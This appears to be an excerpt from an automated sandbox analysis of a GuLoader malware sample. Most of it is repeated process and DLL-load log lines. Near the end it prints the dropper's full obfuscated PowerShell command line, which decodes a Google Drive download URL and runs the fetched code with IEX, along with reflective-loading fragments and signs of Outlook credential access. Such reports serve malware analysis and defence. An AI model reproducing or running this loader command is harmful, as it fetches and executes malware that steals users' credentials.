                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: samlib.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                Source: Binary string: qm.Core.pdb?8 source: powershell.exe, 0000000B.00000002.2355401615.00000000083C0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.2355401615.00000000083C0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: em.Core.pdb source: powershell.exe, 0000000B.00000002.2355401615.00000000083C0000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                VBScript performs obfuscated calls to suspicious functions
                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POWERSHELL "<#Inartistical Turkisen Reenforcement #>;$Hollingsworth='Tffelheltene';<#Niveaudelen Ufordjeligheds I", "0")
                Yara detected GuLoader
                Source: Yara matchFile source: 0000000B.00000002.2356962052.0000000009A96000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2356799011.0000000008860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2333844590.0000000005A7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1444100638.000001AB72CA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Found suspicious powershell code related to unpacking or dynamic code loading
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Foroverbjedes)$global:Unfasting = [System.Text.Encoding]::ASCII.GetString($Stamkortenes)$global:Crispening=$Unfasting.substring($Senehinderne,$Dihydrocuprin)<#Punctualist citoyens Ne
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Coinhere $Drmmetydernes $Hrte), (Effigiating @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Planimetry = [AppDomain]::CurrentDomain.GetAssemblies()$global
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Cullays)), $terminsrenternesarsindkomsterne).DefineDynamicModule($Atremata, $false).DefineType($Circumgestation, $Parabelbenenes, [Sys
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Foroverbjedes)$global:Unfasting = [System.Text.Encoding]::ASCII.GetString($Stamkortenes)$global:Crispening=$Unfasting.substring($Senehinderne,$Dihydrocuprin)<#Punctualist citoyens Ne
                Suspicious powershell command line found
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Inartistical Turkisen Reenforcement #>;$Hollingsworth='Tffelheltene';<#Niveaudelen Ufordjeligheds Initiativriges Honourarily Husbukkens #>;$Husspildevandet=$host.PrivateData;If ($Husspildevandet) {$Antoecians++;}function Dioptres($unjoint){$Curvograph=$Repolarized+$unjoint.Length-$Antoecians;for( $Aftest=5;$Aftest -lt $Curvograph;$Aftest+=6){$Injoint+=$unjoint[$Aftest];}$Injoint;}function Unhandled($Gaggling){ . ($Reprsenterende) ($Gaggling);}$Phoronomy=Dioptres 'nitroMInt,moBergazS,nneiU derlkommalMat iaMac.o/ star5Agend.Korpu0P rfo Sinds(La.ooWReacci SklenNringdBaandoRoun.wGrundsVirke AlpegNUnde TSnoha L,gen1Tekno0 Mass.P.rdo0Tolkd;Insuf FertW twiniFldern Murp6 Skel4Trans;Sygem astox Fo h6Dal e4Agers;.hili Naz erProtevSu.er:Cog i1S aak2vask.1P ani. ambu0Their)sunny ShelGRidseeUrfjecFolkekMaddio En,e/Wheel2Uncli0Ko ce1Skide0Prebl0Zo ia1Firma0benz.1A kom FimreFFahreiDecidrDrifteWind fstrudo,geerxUd.ul/bo,ca1Optra2 Li h1Bortk.Skaml0 Sejr ';$Jordskorpens=Dioptres 'Ph noUGy suS Ba eeRaggeR Beha-FlubbABlowoG Out EDuodeNApo.tTDefin ';$Patienternes=Dioptres ' osethErhvetMora.tCoccopFibrasNdlgn:Mi ti/ Elys/Sk.ggdDiu nrBag jiPre evudfale Knub.Im.ergStiloo FraaoHtt ngLegeml E ekeSolit.SparpcCreamoSalgsm Wind/ FrdiuSi etcNavne?Kni aeIndspxSacchpEctoboSkat,rK nklt Thon=slenddObli.oChirkwCrassnLbeselGlasso B gnaTopkodEnang& ProgiUdskidPluvi=orthi1 SeizETurk 2Varmt2TankrhA rcaSTrkniDCucu.R nelif anrgLImplaSHerpeprubriLRegioTD.scihSuppomUforfHCorr,EMac r9Acco.wTyggejTajikU erebG GorgQDyrticGiese-IntertLagomb Hist9UnvexaMymarxHjtekJArinbLInter ';$Dispowder=Dioptres 'Ruteb> Turo ';$Reprsenterende=Dioptres 'V aleIToldkE VarmXEq,al ';$bytrafik='Konfektionerings';$Peninvariant='\Tallowweed.Kli';Unhandled (Dioptres 'Pneum$Predigpe tal onio KompbAboliaSammelConca:NatteGor.ngeriftmnStr,bd FilaiH ndsgsub etEnchae aurnengrod ybeeFishi=fae y$C ipse H frnAssumvOmb g: Extra ignpPan rptro jd Wis a Helbt Kk,eabehnd+ onse$HoughPMiosie.ruppnSeminiSilvan RimevAffe aMyxoprSiliciGl.veaRntgenMadoqtBienn ');Unhandled (Dioptres ' ale$UrstrgSanitlS kkeo phavbScriba AnaclAmt g:EndurSBinyrtFanera FrafnI oeddNipp s Frere anadSca ae ryde=Mu ke$ ScatPThievaHypogtflippiGoneneBerennQuadrtSetopeViridrExcavnCylineErotisUnhu . Ne bsC.rcepcorralOv rdiFo,est Alko(pa.ro$RavinDC,regiSeps s SlidpDr,bboSpaltw ,arrdOrganeBa ysrUnder)Torch ');Unhandled (Dioptres 'Cross[FouriNHalvdeNonvat Duk,.DemulSB,sieeMediar fllevSweetiOsmancCoe.deCe,toPLyxosoIncooiSkiffnDrg.ttNedslMAttaca BolinNonteaChondgSaussePirrerVrvle]likvi:Germa:PlejeSSa ine PentcAar,tuSeks,rHjerniKirketA atryVarooPShamarRingroEmbrotBestsoP,ckpcSikk.oKl,mrl Slu Unad= lin f rsy[PajamNSandbeNrceitAberr. AvisS UnquekongecFiliouForfarBes,ai Asset Sen yCoaniPForwarUlykkoBubbetenkesoK.strc KopvoIn.eslGang TTransyTha.mp Drate Stam]C ron: Encl:Am siT,indblKonkusLadn.1shops2 Teat ');$Patienternes=$Standsede[0];$Fog
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Inartistical Turkisen Reenforcement #>;$Hollingsworth='Tffelheltene';<#Niveaudelen Ufordjeligheds Initiativriges Honourarily Husbukkens #>;$Husspildevandet=$host.PrivateData;If ($Husspildevandet) {$Antoecians++;}function Dioptres($unjoint){$Curvograph=$Repolarized+$unjoint.Length-$Antoecians;for( $Aftest=5;$Aftest -lt $Curvograph;$Aftest+=6){$Injoint+=$unjoint[$Aftest];}$Injoint;}function Unhandled($Gaggling){ . ($Reprsenterende) ($Gaggling);}$Phoronomy=Dioptres 'nitroMInt,moBergazS,nneiU derlkommalMat iaMac.o/ star5Agend.Korpu0P rfo Sinds(La.ooWReacci SklenNringdBaandoRoun.wGrundsVirke AlpegNUnde TSnoha L,gen1Tekno0 Mass.P.rdo0Tolkd;Insuf FertW twiniFldern Murp6 Skel4Trans;Sygem astox Fo h6Dal e4Agers;.hili Naz erProtevSu.er:Cog i1S aak2vask.1P ani. ambu0Their)sunny ShelGRidseeUrfjecFolkekMaddio En,e/Wheel2Uncli0Ko ce1Skide0Prebl0Zo ia1Firma0benz.1A kom FimreFFahreiDecidrDrifteWind fstrudo,geerxUd.ul/bo,ca1Optra2 Li h1Bortk.Skaml0 Sejr ';$Jordskorpens=Dioptres 'Ph noUGy suS Ba eeRaggeR Beha-FlubbABlowoG Out EDuodeNApo.tTDefin ';$Patienternes=Dioptres ' osethErhvetMora.tCoccopFibrasNdlgn:Mi ti/ Elys/Sk.ggdDiu nrBag jiPre evudfale Knub.Im.ergStiloo FraaoHtt ngLegeml E ekeSolit.SparpcCreamoSalgsm Wind/ FrdiuSi etcNavne?Kni aeIndspxSacchpEctoboSkat,rK nklt Thon=slenddObli.oChirkwCrassnLbeselGlasso B gnaTopkodEnang& ProgiUdskidPluvi=orthi1 SeizETurk 2Varmt2TankrhA rcaSTrkniDCucu.R nelif anrgLImplaSHerpeprubriLRegioTD.scihSuppomUforfHCorr,EMac r9Acco.wTyggejTajikU erebG GorgQDyrticGiese-IntertLagomb Hist9UnvexaMymarxHjtekJArinbLInter ';$Dispowder=Dioptres 'Ruteb> Turo ';$Reprsenterende=Dioptres 'V aleIToldkE VarmXEq,al ';$bytrafik='Konfektionerings';$Peninvariant='\Tallowweed.Kli';Unhandled (Dioptres 'Pneum$Predigpe tal onio KompbAboliaSammelConca:NatteGor.ngeriftmnStr,bd FilaiH ndsgsub etEnchae aurnengrod ybeeFishi=fae y$C ipse H frnAssumvOmb g: Extra ignpPan rptro jd Wis a Helbt Kk,eabehnd+ onse$HoughPMiosie.ruppnSeminiSilvan RimevAffe aMyxoprSiliciGl.veaRntgenMadoqtBienn ');Unhandled (Dioptres ' ale$UrstrgSanitlS kkeo phavbScriba AnaclAmt g:EndurSBinyrtFanera FrafnI oeddNipp s Frere anadSca ae ryde=Mu ke$ ScatPThievaHypogtflippiGoneneBerennQuadrtSetopeViridrExcavnCylineErotisUnhu . Ne bsC.rcepcorralOv rdiFo,est Alko(pa.ro$RavinDC,regiSeps s SlidpDr,bboSpaltw ,arrdOrganeBa ysrUnder)Torch ');Unhandled (Dioptres 'Cross[FouriNHalvdeNonvat Duk,.DemulSB,sieeMediar fllevSweetiOsmancCoe.deCe,toPLyxosoIncooiSkiffnDrg.ttNedslMAttaca BolinNonteaChondgSaussePirrerVrvle]likvi:Germa:PlejeSSa ine PentcAar,tuSeks,rHjerniKirketA atryVarooPShamarRingroEmbrotBestsoP,ckpcSikk.oKl,mrl Slu Unad= lin f rsy[PajamNSandbeNrceitAberr. AvisS UnquekongecFiliouForfarBes,ai Asset Sen yCoaniPForwarUlykkoBubbetenkesoK.strc KopvoIn.eslGang TTransyTha.mp Drate Stam]C ron: Encl:Am siT,indblKonkusLadn.1shops2 Teat ');$Patienternes=$Standsede[0];$Fog
